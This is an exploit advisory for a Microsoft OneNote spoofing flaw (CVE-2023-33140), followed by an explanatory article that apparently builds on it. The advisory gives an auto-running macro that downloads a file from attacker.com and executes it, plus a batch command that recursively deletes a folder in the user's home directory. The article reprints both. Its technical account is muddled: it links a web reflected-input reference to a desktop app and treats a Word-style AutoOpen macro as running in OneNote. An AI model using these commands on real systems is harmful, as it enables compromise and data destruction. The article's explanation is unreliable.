Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub
```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spend:
01:15:00
--Microsoft OneNote 2305 (Build 16.0.16501.20074) 64-bit: A Critical Spoofing Vulnerability Exploited via Malicious URL Injection
On June 22, 2023, cybersecurity researcher nu11secur1ty disclosed a high-severity vulnerability in Microsoft OneNote, specifically affecting version 2305 (Build 16.0.16501.20074) for 64-bit systems. This flaw, identified as CVE-2023-33140, enables attackers to execute remote code through a sophisticated spoofing attack—leveraging the application’s URL handling mechanisms to trick users into downloading and executing malicious payloads.
Understanding the Vulnerability: How Spoofing Works in OneNote
Microsoft OneNote is widely used for digital note-taking, collaboration, and document management across enterprise and personal environments. Its core functionality includes parsing and rendering hyperlinks within notes, allowing users to click on URLs to navigate to external resources. However, this feature becomes a critical attack vector when improperly implemented.
The vulnerability stems from a reflected input issue—where user-provided URLs are directly processed and executed without proper sanitization. As noted in the PortSwigger KB reference [00400c00], the application returns user input in the response context, enabling attackers to inject executable commands.
When a malicious file is opened in OneNote, it can embed crafted URLs that trigger unintended actions. For example, a URL such as http://example.com/ might appear benign—but when rendered, it could contain embedded script logic that executes on the victim’s machine upon click.
Exploit Analysis: Malicious VBScript and Command Execution
One of the most alarming aspects of this vulnerability is the use of VBScript embedded within OneNote files to automate malicious execution. The following code snippet demonstrates how attackers exploit the system:
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub
Explanation: This VBScript subroutine is triggered automatically when the malicious OneNote file is opened. It uses the Shell function to execute a command in the Windows command prompt. The payload performs two actions:
- curl -s https://attacker.com/kurec.badass > kurec.badass: Downloads a malicious executable from a remote server.
- .\kurec.badass: Executes the downloaded file immediately.
Since the script runs with the user’s privileges, it can bypass standard security checks, especially if the file is hosted on a trusted domain or uses HTTPS to appear legitimate.
Inside-Exploit: Deletion of Critical Data
Further evidence of the exploit’s destructive intent is revealed in the following batch script:
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
Explanation: This batch command deletes all files in a predefined directory path—C:\%HOMEPATH%\IMPORTANT\*—using the del /s /q flag. The /s flag recursively deletes files in subdirectories, while /q suppresses confirmation prompts. The use of %HOMEPATH% suggests the exploit targets the user’s home directory, likely to erase sensitive documents, credentials, or backups.
This demonstrates not only remote code execution but also data destruction—a hallmark of ransomware or espionage attacks. The combination of download, execution, and deletion makes this exploit particularly dangerous.
Reproduction and Proof of Concept
The vulnerability was verified and documented by nu11secur1ty in a publicly available repository on GitHub:
- GitHub Repository – Contains the malicious OneNote file, proof-of-concept scripts, and documentation.
- Blog Post – Detailed technical breakdown, timeline, and impact assessment.
These resources confirm the exploit’s reproducibility under controlled conditions, demonstrating that a user merely opening a crafted file and clicking a malicious URL is sufficient to trigger the attack.
Attack Surface and Risk Assessment
| Attack Vector | Impact | Exploitation Difficulty |
|---|---|---|
| Malicious OneNote file via email, shared drive, or phishing link | Remote code execution, data deletion, persistent backdoor | Low (requires user interaction) |
| URL injection in note content | Execution of VBScript or batch commands | Medium (requires crafted payload) |
Key Risk Factors:
- User interaction is required—attackers rely on social engineering to trick users into opening files.
- High privilege execution—malware runs with user-level access, potentially escalating to admin.
- File-based delivery—malicious files can be disguised as legitimate notes, making detection difficult.
Security Recommendations and Mitigations
Given the severity of CVE-2023-33140, organizations and individuals must take immediate action:
- Update OneNote: Ensure all users are running the latest version of Microsoft OneNote. Microsoft has since released patches addressing this vulnerability.
- Disable auto-execution: Configure OneNote to disable automatic script execution. Users should be prompted before any command is executed.
- Use sandboxed environments: Open suspicious files in isolated, non-persistent environments (e.g., virtual machines).
- Implement email and file scanning: Deploy advanced antivirus and URL analysis tools to detect malicious links or file behaviors.
- Train users: Conduct regular security awareness training to recognize phishing attempts involving document-based attacks.
Conclusion: A Wake-Up Call for Digital Note-Taking Security
Microsoft OneNote’s widespread adoption makes it a prime target for cyberattacks. The CVE-2023-33140 exploit underscores a critical truth: even trusted applications can become gateways to compromise if their input handling mechanisms are not rigorously secured.
As the attack demonstrates, a single click on a malicious URL in a seemingly harmless note can lead to full system compromise. This vulnerability is not just a technical flaw—it’s a systemic risk that demands continuous vigilance, proactive patching, and user education.
For security professionals, this case serves as a powerful reminder: trust no input, especially when it comes from unverified sources. Always validate, sanitize, and restrict execution paths—especially in applications that handle user-generated content.